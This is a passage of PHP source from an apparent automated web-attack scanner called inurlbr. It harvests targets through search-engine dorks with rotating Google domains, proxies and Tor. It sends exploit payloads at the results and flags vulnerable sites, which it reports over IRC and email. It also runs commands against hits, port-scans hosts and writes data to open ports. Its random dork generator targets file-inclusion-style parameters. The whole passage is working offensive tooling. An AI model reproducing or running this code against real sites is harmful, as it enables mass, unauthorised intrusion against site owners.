  2732.             $blacklist_ = (!is_null($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $_SESSION["config"]['blacklist']) : $_SESSION["config"]['blacklist'];
  2733.             __plus();
  2734.  
  2735.             if (not_isnull_empty($result_) && !__validateOptions($blacklist_, $result_, 1)) {
  2736.  
  2737.                 $_SESSION["config"]["totas_urls"].= "{$result_}\n";
  2738.             }
  2739.         }
  2740.     }
  2741. }
  2742.  
  2743. ################################################################################
  2744. #DEBUGAR VALORES E PROCESSOS####################################################
  2745. ################################################################################
  2746.  
  2747. function __debug($valor, $op = NULL) {
  2748.  
  2749.     return isset($_SESSION["config"]["debug"]) && __validateOptions($_SESSION["config"]["debug"], $op) ? "\n[ INFO ][ FUNCTION ]=>{$valor['function']}[ DEBUG ] => \n" . print_r($valor['debug']) . "\n" : NULL;
  2750. }
  2751.  
  2752. ################################################################################
  2753. #TIME TO PROCESS SEC############################################################
  2754. ################################################################################
  2755.  
  2756. function __timeSec($camp, $value = NULL) {
  2757.  
  2758.     echo!is_null($_SESSION['config'][$camp]) && !empty($_SESSION['config'][$camp]) ? "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ TIME SEC/DELAY ]::{$_SESSION["c1"]}{ {$_SESSION["c8"]}[ {$_SESSION['config'][$camp]} ]{$_SESSION["c1"]} }{$_SESSION["c0"]}{$value}" : NULL;
  2759.     !is_null($_SESSION['config'][$camp]) ? sleep($_SESSION['config'][$camp]) : NULL;
  2760. }
  2761.  
  2762. ################################################################################
  2763. #SEARCH ENGINE CONFIGURATION####################################################
  2764. ################################################################################
  2765.  
  2766. function __pageEngine($confArray, $motorNome, $motorURL, $dork, $postDados, $pagStart, $pagLimit, $pagIncrement, $pagStart2 = NULL, $pagIncrement2 = NULL) {
  2767.  
  2768.     __plus();
  2769.  
  2770.     echo ("\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ ENGINE ]::{$_SESSION["c1"]}[ {$motorNome} ]{$_SESSION["c0"]}\n");
  2771.     echo (!is_null($_SESSION['config']['max_pag']) ? ("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ LIMIT PAG ]::{$_SESSION["c1"]}[ {$_SESSION['config']['max_pag']} ]{$_SESSION["c0"]}\n") : NULL);
  2772.     $http_proxy = not_isnull_empty($_SESSION['config']['proxy-http-file']) || not_isnull_empty($_SESSION['config']['proxy-http']) ? __proxyHttpRandom() : NULL;
  2773.     echo not_isnull_empty($http_proxy) ? "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ HTTP_PROXY ]:: {$http_proxy}{$_SESSION["c0"]}\n" : NULL;
  2774.     echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ SEARCHING ]:: {$_SESSION["c0"]}\n";
  2775.  
  2776.     $contMaxpg = 0;
  2777.     $pagStart2_ = $pagStart2;
  2778.     $pagStart3_ = $pagStart2;
  2779.     while ($pagStart <= $pagLimit) {
  2780.  
  2781.         echo "{$_SESSION["c1"]}-{$_SESSION["c16"]}[{$_SESSION["c12"]}:::{$_SESSION["c16"]}]{$_SESSION["c0"]}";
  2782.         __plus();
  2783.         $_proxy = not_isnull_empty($confArray["list_proxy_rand"]) && !not_isnull_empty($_SESSION['config']['time-proxy']) ? $confArray["list_proxy_rand"] : $_SESSION["config"]["proxy"];
  2784.         $proxy = not_isnull_empty($_SESSION['config']['proxy-file']) && not_isnull_empty($_SESSION['config']['time-proxy']) ? __timeSecChangeProxy($confArray["list_proxy_file"]) : $_proxy;
  2785.  
  2786.         $murl[0] = str_replace("[DORK]", $dork, $motorURL);
  2787.         $murl[0] = str_replace("[PAG]", $pagStart, $murl[0]);
  2788.         $murl[0] = str_replace("[PAG2]", $pagStart2_, $murl[0]);
  2789.         $murl[0] = str_replace("[PAG3]", $pagStart3_, $murl[0]);
  2790.         $murl[0] = str_replace("[RANDOM]", base64_encode(intval(rand() % 255) . intval(rand() % 2553333)), $murl[0]);
  2791.         $murl[0] = str_replace("[IP]", intval(rand() % 255) . "." . intval(rand() % 255) . "." . intval(rand() % 255) . "." . intval(rand() % 255), $murl[0]);
  2792.  
  2793.  
  2794.         $postDados = !is_null($postDados) ? __convertUrlQuery(parse_url(urldecode($murl[0]), PHP_URL_QUERY)) : NULL;
  2795.  
  2796.         __debug(array('debug' => "[ URL ENGINE ]{$http_proxy}{$murl[0]}", 'function' => '__pageEngine'), 1);
  2797.  
  2798.         $request__ = __request_info($http_proxy . $murl[0], $proxy, $postDados);
  2799.         __plus();
  2800.         $tmp_url = ($motorNome == 'GOOGLE API') ? __filterURLJson($request__["corpo"]) : __filterURL($request__["corpo"], $motorNome);
  2801.         __subProcess($tmp_url);
  2802.         __plus();
  2803.  
  2804.         $pagStart = ($pagStart + $pagIncrement);
  2805.         $pagStart2_ = ($pagStart2_ + $pagIncrement);
  2806.         $pagStart3_ = ($pagStart3_ + $pagIncrement2);
  2807.         $contMaxpg++;
  2808.         __timeSec('delay');
  2809.  
  2810.         if (!is_null($_SESSION['config']['max_pag']) && $_SESSION['config']['max_pag'] == $contMaxpg) {
  2811.  
  2812.             break;
  2813.         }
  2814.     }
  2815. }
  2816.  
  2817. ################################################################################
  2818. #SUB PROCESS INJECT VALUES######################################################
  2819. ################################################################################
  2820.  
  2821. function __subExecExploits($target, $exploitArray = array()) {
  2822.  
  2823.     echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  2824.     echo "         |[ SUB PROCESS ]::\n";
  2825.     $target = __filterHostname($target);
  2826.  
  2827.     foreach ($exploitArray as $value) {
  2828.  
  2829.         $postDados = !is_null($_SESSION["config"]["sub-post"]) ? __convertUrlQuery($value) : NULL;
  2830.         $patch_GP = (is_null($postDados) ? $value : NULL);
  2831.         $url = $target . $_SESSION["config"]["sub-concat"] . $patch_GP;
  2832.  
  2833.         echo "{$_SESSION["c7"]}-[||]{$_SESSION["c0"]}";
  2834.         $resultado__ = __request_info($url, $_SESSION["config"]["proxy"], $postDados);
  2835.         __plus();
  2836.         $ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
  2837.                 strstr($resultado__['server']['http_code'], $_SESSION['config']['ifcode']) ?
  2838.                 "CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
  2839.         $ifredirect = (strstr($resultado__['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ? $resultado__['server']['redirect_url'] : NULL;
  2840.         $_ex['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado__['corpo']);
  2841.  
  2842.         __plus();
  2843.         $_ex['vull_style'] = (not_isnull_empty($_ex['erroReturn'])) ?
  2844.                 "{$_SESSION["c15"]}[ INFO ][ {$_ex['erroReturn']} ]\n[ INFO ][ TARGET POTENTIALLY VULNERABLE ]: " . __cli_beep() : NULL;
  2845.         echo (not_isnull_empty($_ex['erroReturn']) ? "\n{$_ex['vull_style']}{$url}\n{$_SESSION["c0"]}" : NULL);
  2846.         echo (not_isnull_empty($_ex['erroReturn']) ? __saveValue($_SESSION['config']['arquivo_output'], $url, 1) . "\n" : NULL);
  2847.         __plus();
  2848.         $_SESSION['config']['resultado_valores'].=(not_isnull_empty($_ex['erroReturn']) ? "{$url}\n" : NULL);
  2849.         (not_isnull_empty($_ex['erroReturn']) && not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
  2850.                         __ircMsg($_SESSION['config']['irc'], "{$_ex['erroReturn']}::: {$url}") : NULL);
  2851.  
  2852.         (not_isnull_empty($_ex['erroReturn']) && !is_null($_SESSION['config']['sub-cmd-vul']) ? __command($_SESSION['config']['sub-cmd-vul'], $url) : NULL);
  2853.         (not_isnull_empty($_SESSION['config']['sub-cmd-all']) ? __command($_SESSION['config']['sub-cmd-all'], $url) : NULL);
  2854.         __plus();
  2855.         __timeSec('delay');
  2856.     }
  2857.     unset($_ex);
  2858. }
  2859.  
  2860. ################################################################################
  2861. #SEND VALUES EMAIL##############################################################
  2862. ################################################################################
  2863. # (PHP 4, PHP 5) mail — Send mailhttp://php.net/manual/en/function.mail.php
  2864.  
  2865. function __sendMail($email, $value) {
  2866.  
  2867.     $headers = NULL;
  2868.     $headers .= "From: <scanner-inurlbr@localhost>\r\n";
  2869.     $headers .= "MIME-Version: 1.0\r\n";
  2870.     $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  2871.     $headers .= "content-type: text/html\nX-priority: 1\n";
  2872.     $body = "------------------------------------------------------\n";
  2873.     $body.="DATE:  [" . date("d-m-Y H:i:s") . "]";
  2874.     $body.=not_isnull_empty($_SESSION['config']['http-header']) ? "HTTP HEADER: {$_SESSION['config']['http-header']}\n" : NULL;
  2875.     $body.=not_isnull_empty($_SESSION['config']['motor']) ? "MOTOR BUSCA: {$_SESSION['config']['motor']}\n" : NULL;
  2876.     $body.=not_isnull_empty($_SESSION['config']['tipoerro']) ? "TIPO ERROR: {$_SESSION['config']['tipoerro']}\n" : NULL;
  2877.     $body.=not_isnull_empty($_SESSION['config']['exploit-get']) ? "EXPLOIT GET: {$_SESSION['config']['exploit-get']}\n" : NULL;
  2878.     $body.=not_isnull_empty($_SESSION['config']['exploit-post']) ? "EXPLOIT-POST: {$_SESSION['config']['exploit-post']}\n" : NULL;
  2879.     $body.=not_isnull_empty($_SESSION['config']['command-vul']) ? "COMMAND VUL: {$_SESSION['config']['command-vul']}\n" : NULL;
  2880.     $body.=not_isnull_empty($_SESSION['config']['command-all']) ? "COMMAND ALL: {$_SESSION['config']['command-all']}\n" : NULL;
  2881.     $body.=not_isnull_empty($_SESSION['config']['user-agent']) ? "USER AGENT: {$_SESSION['config']['user-agent']}\n" : NULL;
  2882.     $body.= "------------------------------------------------------\n";
  2883.  
  2884.     if (mail($email, "[ INFO ][ OUTPUT INURLBR ]:: {$value}", $body, $headers)) {
  2885.         __plus();
  2886.         return "[ INFO ][ SUBMITTED SUCCESSFULLY ]\n";
  2887.     } else {
  2888.         __plus();
  2889.         return "[ INFO ][ NOT SENT ]\n";
  2890.     }
  2891. }
  2892.  
  2893. ################################################################################
  2894. #HOST GOOGLE RANDOM#############################################################
  2895. ################################################################################
  2896.  
  2897. function __dominioGoogleRandom() {
  2898.  
  2899.     $_SESSION["random"]['dominio_google'] = array(
  2900.         'www.google.com', 'www.google.ac', 'www.google.com.om',
  2901.         'www.google.ad', 'www.google.ae', 'www.google.com.af',
  2902.         'www.google.com.ag', 'www.google.com.ai', 'www.google.am',
  2903.         'www.google.it.ao', 'www.google.com.ar', 'www.google.cat',
  2904.         'www.google.as', 'www.google.at', 'www.google.com.au',
  2905.         'www.google.az', 'www.google.ba', 'www.google.com.bd',
  2906.         'www.google.be', 'www.google.bf', 'www.google.bg',
  2907.         'www.google.com.bh', 'www.google.bi', 'www.google.bj',
  2908.         'www.google.com.bn', 'www.google.com.bo', 'www.google.com.br',
  2909.         'www.google.bs', 'www.google.co.bw', 'www.google.com.by',
  2910.         'www.google.com.bz', 'www.google.ca', 'www.google.com.kh',
  2911.         'www.google.cc', 'www.google.cd', 'www.google.cf',
  2912.         'www.google.cn', 'www.google.com.co', 'www.google.co.nz',
  2913.         'www.google.cg', 'www.google.ch', 'www.google.ci',
  2914.         'www.google.co.ck', 'www.google.cl', 'www.google.cm',
  2915.         'www.google.co.cr', 'www.google.com.cu', 'www.google.cv',
  2916.         'www.google.cz', 'www.google.de', 'www.google.nu',
  2917.         'www.google.dj', 'www.google.dk', 'www.google.dm',
  2918.         'www.google.com.do', 'www.google.dz', 'www.google.no',
  2919.         'www.google.com.ec', 'www.google.ee', 'www.google.com.eg',
  2920.         'www.google.es', 'www.google.com.et', 'www.google.com.np',
  2921.         'www.google.fi', 'www.google.com.fj', 'www.google.fm',
  2922.         'www.google.fr', 'www.google.ga', 'www.google.nl',
  2923.         'www.google.ge', 'www.google.gf', 'www.google.gg',
  2924.         'www.google.com.gh', 'www.google.com.gi', 'www.google.nr',
  2925.         'www.google.gl', 'www.google.gm', 'www.google.gp',
  2926.         'www.google.gr', 'www.google.com.gt', 'www.google.com.ni',
  2927.         'www.google.gy', 'www.google.com.hk', 'www.google.hn',
  2928.         'www.google.hr', 'www.google.ht', 'www.google.com.ng',
  2929.         'www.google.hu', 'www.google.co.id', 'www.google.iq',
  2930.         'www.google.ie', 'www.google.co.il', 'www.google.com.nf',
  2931.         'www.google.im', 'www.google.co.in', 'www.google.io',
  2932.         'www.google.is', 'www.google.it', 'www.google.ne',
  2933.         'www.google.je', 'www.google.com.jm', 'www.google.jo',
  2934.         'www.google.co.jp', 'www.google.co.ke', 'www.google.com.na',
  2935.         'www.google.ki', 'www.google.kg', 'www.google.co.kr',
  2936.         'www.google.com.kw', 'www.google.kz', 'www.google.co.mz',
  2937.         'www.google.la', 'www.google.com.lb', 'www.google.com.lc',
  2938.         'www.google.li', 'www.google.lk', 'www.google.com.my',
  2939.         'www.google.co.ls', 'www.google.lt', 'www.google.lu',
  2940.         'www.google.lv', 'www.google.com.ly', 'www.google.com.mx',
  2941.         'www.google.co.ma', 'www.google.md', 'www.google.me',
  2942.         'www.google.mg', 'www.google.mk', 'www.google.mw',
  2943.         'www.google.ml', 'www.google.mn', 'www.google.ms',
  2944.         'www.google.com.mt', 'www.google.mu', 'www.google.mv',
  2945.         'www.google.com.pa', 'www.google.com.pe', 'www.google.com.ph',
  2946.         'www.google.com.pk', 'www.google.pn', 'www.google.com.pr',
  2947.         'www.google.ps', 'www.google.pt', 'www.google.com.py',
  2948.         'www.google.com.qa', 'www.google.ro', 'www.google.rs',
  2949.         'www.google.ru', 'www.google.rw', 'www.google.com.sa',
  2950.         'www.google.com.sb', 'www.google.sc', 'www.google.se',
  2951.         'www.google.com.sg', 'www.google.sh', 'www.google.si',
  2952.         'www.google.sk', 'www.google.com.sl', 'www.google.sn',
  2953.         'www.google.sm', 'www.google.so', 'www.google.st',
  2954.         'www.google.com.sv', 'www.google.td', 'www.google.tg',
  2955.         'www.google.co.th', 'www.google.tk', 'www.google.tl',
  2956.         'www.google.tm', 'www.google.to', 'www.google.com.tn',
  2957.         'www.google.com.tr', 'www.google.tt', 'www.google.com.tw',
  2958.         'www.google.co.tz', 'www.google.com.ua', 'www.google.co.ug',
  2959.         'www.google.co.uk', 'www.google.us', 'www.google.com.uy',
  2960.         'www.google.co.uz', 'www.google.com.vc', 'www.google.co.ve',
  2961.         'www.google.vg', 'www.google.co.vi', 'www.google.com.vn',
  2962.         'www.google.vu', 'www.google.ws', 'www.google.co.za',
  2963.         'www.google.co.zm', 'www.google.co.zw'
  2964.     );
  2965.  
  2966.     return $_SESSION["random"]['dominio_google'][rand(0, count($_SESSION["random"]['dominio_google']) - 1)];
  2967. }
  2968.  
  2969. ################################################################################
  2970. #(CSE)-GOOGLE Custom Search Engine ID RANDOM####################################
  2971. ################################################################################
  2972.  
  2973. function __googleGenericRandom() {
  2974.  
  2975.     $generic = array(
  2976.         '013269018370076798483:wdba3dlnxqm',
  2977.         '005911257635119896548:iiolgmwf2se',
  2978.         '007843865286850066037:b0heuatvay8',
  2979.         '002901626849897788481:cpnctza84gq',
  2980.         '006748068166572874491:55ez0c3j3ey',
  2981.         '012984904789461885316:oy3-mu17hxk',
  2982.         '006688160405527839966:yhpefuwybre',
  2983.         '003917828085772992913:gmoeray5sa8',
  2984.         '007843865286850066037:3ajwn2jlweq',
  2985.         '010479943387663786936:wjwf2xkhfmq',
  2986.         '012873187529719969291:yexdhbzntue',
  2987.         '012347377894689429761:wgkj5jn9ee4'
  2988.     );
  2989.     return $generic[rand(0, count($generic) - 1)];
  2990. }
  2991.  
  2992. ################################################################################
  2993. #PROXY HTTP BASE FILE###########################################################
  2994. ################################################################################
  2995.  
  2996. function __proxyHttpRandom() {
  2997.  
  2998.     $proxy_file = (file_exists($_SESSION['config']['proxy-http-file']) ? __openFile($_SESSION['config']['proxy-http-file'], 1) : array());
  2999.     $proxy_ = is_array($proxy_file) ? array_merge($_SESSION['config']['proxy-http'], $proxy_file) : $_SESSION['config']['proxy-http'];
  3000.  
  3001.     return $proxy_[rand(0, count($proxy_) - 1)];
  3002. }
  3003.  
  3004. ################################################################################
  3005. #FILTER UNIQUE DOMAIN###########################################################
  3006. ################################################################################
  3007.  
  3008. function __filterDomainUnique($resultados) {
  3009.  
  3010.     if (is_array($resultados)) {
  3011.  
  3012.         foreach ($resultados as $value) {
  3013.  
  3014.             $temp[] = "http://" . __filterHostname($value);
  3015.         }
  3016.  
  3017.         return array_unique(array_filter($temp));
  3018.     }
  3019.  
  3020.     return FALSE;
  3021. }
  3022.  
  3023. ################################################################################
  3024. #FILTER IF URL DOMAIN###########################################################
  3025. ################################################################################
  3026.  
  3027. function __filterURLif($resultados) {
  3028.  
  3029.     if (is_array($resultados)) {
  3030.  
  3031.         foreach ($resultados as $value) {
  3032.  
  3033.             $temp[] = not_isnull_empty($_SESSION['config']['ifurl']) && strstr($value, $_SESSION['config']['ifurl']) ? $value : NULL;
  3034.         }
  3035.  
  3036.         return array_unique(array_filter($temp));
  3037.     }
  3038.  
  3039.     return FALSE;
  3040. }
  3041.  
  3042. ################################################################################
  3043. #GENERATOR RANGE IP#############################################################
  3044. ################################################################################
  3045.  
  3046. function __generatorRangeIP($range) {
  3047.  
  3048.     $ip_ = explode(',', $range);
  3049.     if (is_array($ip_)) {
  3050.  
  3051.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  3052.         while ($_[0] <= $_[1]) {
  3053.  
  3054.             $ips[] = "http://" . long2ip($_[0]);
  3055.             $_[0] ++;
  3056.         }
  3057.     } else {
  3058.  
  3059.         return FALSE;
  3060.     }
  3061.  
  3062.     return $ips;
  3063. }
  3064.  
  3065. ################################################################################
  3066. #GENERATOR RANGE IP RANDOM######################################################
  3067. ################################################################################
  3068.  
  3069. function __generatorIPRandom($cont) {
  3070.  
  3071.     $cont[0] = 0;
  3072.     while ($cont[0] < $cont[1]) {
  3073.  
  3074.         $bloc[0] = rand(0, 255);
  3075.         $bloc[1] = rand(0, 255);
  3076.         $bloc[2] = rand(0, 255);
  3077.         $bloc[3] = rand(0, 255);
  3078.         $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  3079.         $cont[0] ++;
  3080.     }
  3081.     return array_unique($ip);
  3082. }
  3083.  
  3084. ################################################################################
  3085. #ACESSING FILE ROBOTS###########################################################
  3086. ################################################################################
  3087.  
  3088. function __getValuesRobots($url) {
  3089.  
  3090.     $_[0] = "http://" . __filterHostname($url) . "/robots.txt";
  3091.     $_[0] = __request_info($_[0], $_SESSION["config"]["proxy"], NULL);
  3092.     echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  3093.     echo "         |[ ACCESSING FILE ROBOTS ]::\n";
  3094.  
  3095.     if (not_isnull_empty($_[0]['corpo']) && $_[0]['server']['http_code'] == 200) {
  3096.  
  3097.         $_[1] = array_unique(array_filter(explode("\n", $_[0]['corpo'])));
  3098.  
  3099.         foreach ($_[1] as $value) {
  3100.  
  3101.             if (strstr($value, 'Disallow:') || strstr($value, 'Allow:')) {
  3102.  
  3103.                 echo "|_[ + ]__|[ value={$value}\n";
  3104.                 __saveValue($_SESSION['config']['arquivo_output'], $value, 2);
  3105.             }
  3106.             __plus();
  3107.         }
  3108.     } else {
  3109.  
  3110.         echo "\t[x][ ERRO ] LOAD FILE ROBOTS.TXT [ COD_HTTP ]:: {$_[0]['server']['http_code']}\n{$_SESSION["c0"]}";
  3111.     }
  3112. }
  3113.  
  3114. ################################################################################
  3115. #Base64 string encryption md5 , hexadecimal, hex, base64 & random string########
  3116. ################################################################################
  3117.  
  3118. function __crypt($url) {
  3119.  
  3120.     preg_match_all("#(md5|base64|hex|random)(\()(.*?)(\))#", $url, $_);
  3121.     $cont = 0;
  3122.  
  3123.     foreach ($_[0] as $replace) {
  3124.  
  3125.         if (strstr($replace, 'md5('))
  3126.             $func = 'md5';
  3127.  
  3128.         if (strstr($replace, 'base64('))
  3129.             $func = 'base64_encode';
  3130.  
  3131.         if (strstr($replace, 'hex('))
  3132.             $func = 'bin2hex';
  3133.  
  3134.         if (strstr($replace, 'random('))
  3135.             $func = 'random';
  3136.  
  3137.         $url = str_replace($replace, $func($_[3][$cont]), $url);
  3138.         $cont ++;
  3139.     }
  3140.     return $url;
  3141. }
  3142.  
  3143. ################################################################################
  3144. #GENERATE RANDOM STRING#########################################################
  3145. ################################################################################
  3146. #(PHP4,PHP5) Shuffle an array http://php.net/manual/en/function.shuffle.php
  3147.  
  3148. function random($__) {
  3149.     $_ = 'A,a,B,b,C,c,D,d,E,e,F,f,G,g,';
  3150.     $_.= 'H,h,I,i,J,j,K,k,L,l,M,m,';
  3151.     $_.= '1,2,3,4,5,6,7,8,9,0';
  3152.     $_ = explode(',', $_);
  3153.     shuffle($_);
  3154.     $_ = implode($_, '');
  3155.     return substr($_, 0, $__);
  3156. }
  3157.  
  3158. ################################################################################
  3159. #GENERATE RANDOM DORKS##########################################################
  3160. ################################################################################
  3161.  
  3162. function __randomDork($_) {
  3163.  
  3164.     $dk[1] = array('view', 'page', 'index', 'file', 'ver', 'web', 'form', 'public', 'map', 'visit',
  3165.         'site', 'perfil', 'sistema', 'system', 'cad', 'frm', 'content', 'conteudo', 'graf', 'page',
  3166.         'search', 'arch', 'class', 'app', 'galeria', 'text', 'noticia', 'default', 'storytopic', 'home',
  3167.         'lenoticia', 'counter', 'todos', 'all', 'principal', 'main', 'pesquisa', 'dir', 'category', 'news_more',
  3168.         'info', 'display', 'showrecord', 'download', 'sum', 'produtos', 'Menu', 'guia', 'product', 'about',
  3169.         'WebForms', 'proj', 'inter', 'PageText', 'topper', 'notes', 'name', 'redirect', 'open_link', 'artist',
  3170.         'curricu', 'resumen', 'top', 'list', 'directorio', 'Project', 'membre', 'photos', 'Contenido',
  3171.         'presentation', 'component', 'release', 'article', 'asesores', 'Detail', 'about', 'lire', 'story',
  3172.         'memoriam', 'transport', 'journal', 'album', 'community', 'includes', 'ler', 'video', 'configs', 'refer',
  3173.         'form_cpf', 'atualiza', 'refresh', 'materia', 'fotos', 'photos', 'itemdetail', 'listcategoriesandproduct',
  3174.         'myaccount', 'learnmore', 'powersearch', 'prodbycat', 'prodetails', 'prodlist', 'productDisplay', 'promotion',
  3175.         'pview', 'resellers', 'inc', 'oferta', 'layout', 'standard', 'blank', 'path', 'declaration', 'newsitem', 'games',
  3176.         'buy', 'readnews', 'event', 'news_view', 'communique_detail', 'kategorie', 'preview', 'faq2', 'comment', 'newsDetail',
  3177.         'shopping', 'shop_category', 'product_ranges_view', 'section', 'ages', 'curriculum', 'galeri_info', 'tekst', 'play_old',
  3178.         'viewapp', 'padrao', 'sitio', 'head', 'template', 'index1', 'index2', 'index3', 'index4', 'index5', 'mod', 'press', 'gery',
  3179.         'index_table', 'mainfile', '_functions', 'phpshop', 'new-visitor.inc', 'Packages', 'editor', 'board', 'advanced', 'pref',
  3180.         'q', 'side', 'home1', 'home2', 'home3', 'getbook', 'checkout', 'affiliate', 'addcart', 'product_info', 'showsub', 'library',
  3181.         'edition', 'get', 'temp', 'catalog', 'press2', 'company', 'jobs', 'review', 'input', 'cats', 'showmedia', 'event_info'
  3182.     );
  3183.  
  3184.  
  3185.     $dk[2] = array('view', 'file', 'ver', 'web', 'form', 'public', 'map', 'site', 'perfil', 'bookid',
  3186.         'sistema', 'system', 'cad', 'frm', 'content', 'id', 'action', 'user', 'option', 'area', 'catalogid',
  3187.         'tp', 'pg', 'p', 'v', 'a', 't', 'r', 'o', 'm', 'n', 'sec', 'lang', 'search', 'Itemid', 'open',
  3188.         'servicoid', 'id_ap', 'artic', 'pag', 'archive', 'ind', 'sigl', 'url', 'link', 'tp', 'cd', 'item_ID',
  3189.         'web', 'sourc', 'sitemap', 'go', 'galeria', 'img', 'notic', 'num', 'ter', 'dow', 'type', 'CartId',
  3190.         'redir', 'default', 'storytopic', 'topic', 'cod_noti', 'detalhe', 'ler', 'storyid', 'start',
  3191.         'click', 'title', 'tmpl', 'templat', 'cont', 'corp', 'contat', 'consult', 'main', 'exib', 'guia',
  3192.         'span', 'OpenDocument', 'document', 'codidem', 'pesq', 'print', 'imprimir', 'jobs', 'pic', 'contri',
  3193.         'code', 'myPage', 'openPage', 'homepage', 'home', 'inner', 'custom', 'bin', 'IsisScript', 'pid',
  3194.         'wxis.exe', 'wood', 'modules', 'kbn', 'chid', 'jump', 'mes', 'ano', 'month', 'year', 'day', 'dia', 'pre',
  3195.         'show', 'download', 'summit', 'new', 'coming', 'Category', 'produtos', 'Menu', 'uid', 'Consulta', 'qry',
  3196.         'product', 'WebForms', 'proj', 'inter', 'scgi', 'orig_q', 'b1', 'showpage', 'filter', 'Detail', 'about',
  3197.         'itemlist', 'memor', 'info', 'website', 'cidade', 'lic', 'materia', 'SEC_', 'includes', 'store', 'ler',
  3198.         'reader', 'src', 'theme', 'Boletim', 'busca', 'date', 'video', 'configs', 'exec', 'doc', 'refresh', 'telec',
  3199.         'digital', 'materia', 'portal', 'shop', 'photos', 'sales', 'open', 'check', 'token', 'general', 'process', 'ViewType',
  3200.         'idCategor', 'intCatalogID', 'Cart', 'maingroup', 'play', 'where', 'mod', 'panel', 'str', 'staff_id', 'buy', 'preview',
  3201.         'chapter', 'club_id', 'GLOBALS', 'absolute_path', 'body', 'from', 'pg_ID', 'load', 'systempath', 'conf', 'do', 'x', 'temp',
  3202.         'see', 'act', 'middle', 'content', 'q', 'my', 'to', 'nivel', 'arq', 'modo', 'rss', 'pagina', 'opcion', 'loader', 'l', 'this',
  3203.         'subject', 'param', 'index', 'tipo', 'second', 'loc', 'cat_id', 'magazin', 'artist_art', 'cID', 'cat', 'message_id', ''
  3204.     );
  3205.  
  3206.     $dk[3] = array('aspx', 'asp', 'cfm', 'php', 'php3', 'pl', 'cgi', 'py', 'jsp');
  3207.  
  3208.     for ($i = 0; $i <= $_; $i++) {
  3209.  
  3210.         $dm = NULL;
  3211.         $da = $dk[1][rand(0, count($dk[1]) - 1)];
  3212.         $dg = $dk[2][rand(0, count($dk[2]) - 1)];
  3213.         $de = $dk[3][rand(0, count($dk[3]) - 1)];
  3214.  
  3215.         $__[] = "\"{$dm}/{$da}.{$de}?{$dg}\"";
  3216.     }
  3217.     return $__;
  3218. }
  3219.  
  3220. ################################################################################
  3221. #VALIDATING OPEN DOORS##########################################################
  3222. ################################################################################
  3223. #(PHP 4, PHP 5) fsockopen — Open Internet or Unix domain socket connection
  3224. #http://php.net/manual/en/function.fsockopen.php
  3225.  
  3226. function __portScan($_) {
  3227.  
  3228.     // FORMAT PORTS 80, 8181, 22, 21
  3229.     $ports = explode(',', $_[1]);
  3230.     echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  3231.     echo "         |[ PROCESS PORT-SCAN ]::\n";
  3232.     foreach ($ports as $value) {
  3233.  
  3234.         $conc = fsockopen($_SESSION['config']['server_ip'], $value, $_[2], $_[3], 30);
  3235.         // HOST, POST, ERROR1, ERROR3, TIMEOUT
  3236.  
  3237.         __plus();
  3238.  
  3239.         if ($conc) {
  3240.  
  3241.             echo "{$_SESSION["c1"]}|_[ + ]__|[ {$value}=\033[1m\033[32mOPEN{$_SESSION["c0"]}";
  3242.             (not_isnull_empty($_SESSION['config']['port-write']) ? __portWrite($conc, $_SESSION['config']['port-write']) : NULL);
  3243.             __saveValue($_SESSION['config']['arquivo_output'], "{$value}=OPEN", 2);
  3244.  
  3245.             __plus();
  3246.             $_[0]['url_port'] = $value;
  3247.             (not_isnull_empty($_SESSION['config']['port-cmd']) ? __command($_SESSION['config']['port-cmd'], $_[0]) : NULL);
  3248.             __plus();
  3249.         } else {
  3250.  
  3251.             echo "{$_SESSION["c1"]}|_[ x ]__|[ {$value}={$_SESSION["c9"]}CLOSED{$_SESSION["c0"]}\n";
  3252.             __plus();
  3253.         }
  3254.     }
  3255.     echo $_SESSION["c0"];
  3256.     fclose($conc);
  3257. }
  3258.  
  3259. ################################################################################
  3260. #WRITING ON THE DOOR############################################################
  3261. ################################################################################
  3262. #(PHP 4, PHP 5) fwrite — Binary-safe file write
  3263. #http://php.net/manual/pt_BR/function.fwrite.php
  3264.  
  3265. function __portWrite($conect, $valores) {
  3266.  
  3267.     $valores = explode(',', $valores);
  3268.     foreach ($valores as $value) {
  3269.  
  3270.         echo "{$_SESSION["c1"]}|_[ + ]__|[ WRITE SEND={$value}{$_SESSION["c0"]}\n";
  3271.         fwrite($conect, "{$value}\r\n") . sleep(3);
  3272.         __plus();
  3273.     }
  3274. }
  3275.  
  3276. ################################################################################
  3277. #CODE SEARCH ENGINES############################################################
  3278. ################################################################################
  3279. //$_SESSION['config']['cod'] = '
  3280.  
  3281. function __engines($dork, $list_proxy) {
  3282.  
  3283.     $dork_ = (not_isnull_empty($dork)) ? $dork : __getOut("DEFINA SUA DORK\n");
  3284.     $list_proxy_ = (!is_null($list_proxy) ? $list_proxy[rand(0, count($list_proxy) - 1)] : NULL);
  3285.  
  3286.     $confArray = array("list_proxy_rand" => $list_proxy_, "list_proxy_file" => $list_proxy);
  3287.  
  3288.     (!is_null($_SESSION["config"]["tor-random"]) && !is_null($_SESSION["config"]["proxy"]) ? __renewTOR() : NULL);
  3289.  
  3290.     echo "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ SEARCHING ]:: {$_SESSION["c1"]}{{$_SESSION["c0"]} ";
  3291.  
  3292.     __plus();
  3293.  
